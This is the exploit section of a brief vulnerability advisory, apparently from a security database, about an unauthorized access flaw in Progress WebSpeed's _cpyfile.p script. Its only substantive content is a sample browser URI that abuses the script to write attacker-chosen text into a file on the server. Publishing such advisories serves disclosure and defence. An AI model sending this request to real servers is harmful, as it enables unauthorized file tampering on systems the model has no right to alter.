• info
• discussion
• exploit
• solution
• references

Progress Webspeed _CPYFile.P Unauthorized Access Vulnerability

An attacker can use a browser to exploit this issue.

A sample URI has been provided:

http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/webutil/_cpyfile.p?options=save,editor&tempFile=dummy.tmp&fil
eName=C:/root.txt&action=last&section=1&txt0=Test